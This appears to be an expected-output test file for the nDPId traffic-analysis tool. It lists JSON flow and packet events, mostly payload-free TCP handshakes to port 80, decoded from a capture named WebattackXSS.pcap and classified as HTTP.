+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347988233,"flow_last_seen":1499347988233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988233,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8466,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1499347988233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347988233,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aCNAAD4GXa2sEAABwKgKMofoAFBt56SsAAAAAKACchD2awAAAgQFtAQCCAoBPMyPAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":2,"flow_last_seen":1499347988233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347988233,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh+gH+IEYbeekraAScSDMUAAAAgQFtAQCCAoD5p4DATzMjwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8468,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":3,"flow_last_seen":1499347988234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347988234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aCRAAD4GXbSsEAABwKgKMofoAFBt56StB\/iBGYAQAOVrWAAAAQEICgE8zI8D5p4D"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347855324,"flow_last_seen":1499347860860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33404,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347856593,"flow_last_seen":1499347861860,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33418,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347859192,"flow_last_seen":1499347864861,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33444,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347860489,"flow_last_seen":1499347865862,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347861783,"flow_last_seen":1499347866863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347863072,"flow_last_seen":1499347868864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347988894,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347989526,"flow_last_seen":1499347989526,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347989526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1499347989526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8S9BAAD4GegCsEAABwKgKMof2AFDafYYCAAAAAKACchCnLgAAAgQFtAQCCAoBPM3SAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8479,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":2,"flow_last_seen":1499347989526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347989526,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh\/a7HZT72n2GA6AScSC0xwAAAgQFtAQCCAoD5p9GATzN0gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8480,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":3,"flow_last_seen":1499347989526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347989526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0S9FAAD4GegesEAABwKgKMof2AFDafYYDux2U\/IAQAOVTzgAAAQEICgE8zdMD5p9G"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347992139,"flow_last_seen":1499347992139,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347992139,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1499347992139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347992139,"pkt":"ABm5CmnxAMGxFOsxCABFAAA866dAAD4G2iisEAABwKgKMogQAFBfGDvHAAAAAKACchBqJwAAAgQFtAQCCAoBPNBgAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8501,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":2,"flow_last_seen":1499347992139,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347992139,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiBBHAQA0Xxg7yKAScSB+FgAAAgQFtAQCCAoD5qHUATzQYAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8502,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":3,"flow_last_seen":1499347992140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347992140,"pkt":"ABm5CmnxAMGxFOsxCABFAAA066hAAD4G2i+sEAABwKgKMogQAFBfGDvIRwEANYAQAOUdHgAAAQEICgE80GAD5qHU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347993411,"flow_last_seen":1499347993411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347993411,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1499347993411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347993411,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wWNAAD4GBG2sEAABwKgKMogeAFD5yRD9AAAAAKACchD48wAAAgQFtAQCCAoBPNGeAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":2,"flow_last_seen":1499347993411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347993411,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiB6gRZIr+ckQ\/qAScSAgaQAAAgQFtAQCCAoD5qMSATzRngEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":3,"flow_last_seen":1499347993412,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347993412,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wWRAAD4GBHSsEAABwKgKMogeAFD5yRD+oEWSLIAQAOW\/cAAAAQEICgE80Z4D5qMS"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347994680,"flow_last_seen":1499347994680,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347994680,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":1,"flow_last_seen":1499347994680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347994680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eXlAAD4GTFesEAABwKgKMogsAFCPtauiAAAAAKACchDHFwAAAgQFtAQCCAoBPNLbAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":2,"flow_last_seen":1499347994680,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347994680,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiCwnn9QNj7Wro6AScSAkFAAAAgQFtAQCCAoD5qRPATzS2wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":602,"flow_packet_id":3,"flow_last_seen":1499347994681,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347994681,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eXpAAD4GTF6sEAABwKgKMogsAFCPtaujJ5\/UDoAQAOXDGwAAAQEICgE80tsD5qRP"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8539,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347997344,"flow_last_seen":1499347997344,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347997344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8539,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":1,"flow_last_seen":1499347997344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347997344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nDhAAD4GKZisEAABwKgKMohGAFAyaklNAAAAAKACchCEBAAAAgQFtAQCCAoBPNV1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":2,"flow_last_seen":1499347997344,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347997344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiEaQGXl+MmpJTqAScSDQewAAAgQFtAQCCAoD5qbpATzVdQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":603,"flow_packet_id":3,"flow_last_seen":1499347997345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347997345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nDlAAD4GKZ+sEAABwKgKMohGAFAyaklOkBl5f4AQAOVvgwAAAQEICgE81XUD5qbp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347998605,"flow_last_seen":1499347998605,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1499347998605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MQxAAD4GlMSsEAABwKgKMohUAFBMT+e8AAAAAKACchDKZgAAAgQFtAQCCAoBPNawAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":2,"flow_last_seen":1499347998605,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiFT+qOY2TE\/nvaAScSA6WwAAAgQFtAQCCAoD5qgkATzWsAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":3,"flow_last_seen":1499347998606,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347998606,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MQ1AAD4GlMusEAABwKgKMohUAFBMT+e9\/qjmN4AQAOXZYQAAAQEICgE81rED5qgk"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347868358,"flow_last_seen":1499347873865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 